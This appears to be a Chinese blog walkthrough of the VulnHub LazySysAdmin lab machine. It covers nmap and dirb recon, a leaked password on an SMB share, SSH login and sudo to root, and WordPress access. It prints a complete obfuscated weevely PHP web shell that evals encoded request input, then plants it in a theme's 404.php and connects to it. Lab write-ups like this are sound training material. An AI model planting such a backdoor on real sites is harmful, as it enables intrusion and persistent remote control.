靶机lazyadmin

下载地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/

配置环境

kali Ip:192.168.87.128

靶机ip:192.168.87.174

一.信息收集

1.主机发现

由于是靶机环境,目标主机与本地在同一网段,使用nmap进行网段扫描,探测存活主机,由结果判断192.168.87.169看起来像目标主机ip。

nmap -sn 192.168.87.0/24

2.扫描主机

对主机进行各种端口扫描

nmap -A -T4 -O -p 0-65535 192.168.87.174
nmap -A 192.168.87.174//强力扫描,耗时长

nmap -O 192.168.87.174 //对目标主机的操作系统进行扫描

nmap 192.168.87.174 -p < portnumber > //对指定端口扫描

nmap -T4 指定扫描过程使用的时序,(总共6个级别[0-5]),级别越高,扫描速度越快,但容易被防火墙或IDS检测屏蔽掉)。

3.目录扫描

因为扫描出开放了80端口,证明有http服务,直接访问首页

使用dirb工具扫描

dirb http://192.168.87.174

扫描结果如下,发现有wordpress和phpmyadmin

二.漏洞利用

1.SSH

根据前面信息收集,发现了有一个smb服务,我们可以直接尝试连接smb://192.168.87.174,发现居然是网站的后台文件

发现了deets,txt文件里面有秘密,密码12345

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

根据前面web服务扫描,发现了有wordpress,直接访问http://192.168.87.174/wordpress,发现反复强调自己的名字是togie,猜测ssh用户是togie密码是12345,尝试连接

ssh togie@192.168.87.174

连接成功

接下来就要提权,我们查看当前的togie是否可以sudo

sudo -l

发现可以,不废话直接sudo

sudo -i

这一阶段都接受了

前面在做信息收集的时候发现了数据库账户和密码,在wordpress文件夹里的wp-config.php里面

账户:Admin

密码:TogieMYSQL12345^^

直接登录phpmyadmin,发现什么用都没有

尝试登录wordpress

发现可以

使用kali自带的工具weevely,生成木马命令,在当前目录生成一个叫做wandan.php的文件密码为feile

weevely generate feile/wandan.php

<?php
$f='$k="F94b5a0303"F9;F9$kh="a2F9bbF9124683ca";F9F9$kf="7652fcbF967402";$pF9="y0pMF95k2l3vF9QitSJU";fF9F9unction x($F9F9t,$F';
$L='o.=$t{$iF9}^F9$k{$F9j};}}returF9n $oF9;}if F9(@pF9reg_match("F9/$kh(.+)F9$F9kf/",@file_geF9t_coF9ntF9ents("phF9p://inp';
$G='utF9"),$F9m)==1F9F9)F9 {@ob_start();@eF9val(@gzF9uF9ncoF9mpress(@x(@basF9eF964_decodF9e($m[1]F9),$F9k)F9));F9$o=@ob_ge';
$D='9k){$c=stF9rlen($k)F9;$F9l=strlenF9($t);$o="";fF9or(F9$i=0;$iF9<$F9l;){for($j=0;F9($j<$c&F9F9&$i<$F9l);$j+F9F9+,$i++){$';
$x='t_conF9tents();@obF9_end_F9cleaF9n();$r=@bF9ase64_encF9ode(@x(F9@gzF9compF9ress($o),$kF9));pF9riF9ntF9("$p$kh$r$kf");}';
$S=str_replace('Vq','','VqcreaVqtVqe_VqfuVqncVqtion');
$I=str_replace('F9','',$f.$D.$L.$G.$x);
$w=$S('',$I);$w();
?>

然后把文件内容代码复制Appearance>Editor>404 Templatesd,完成后点击updatefile

访问404文件,路径是/wordpress/wp-content/themes/twentyfifteen/404.php,在kali里面输入如下命令来连接

weevely http://192.168.87.174/wordpress/wp-content/themes/twentyfifteen/404.php pass

至此,此次试验圆满完成!

  • 21
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值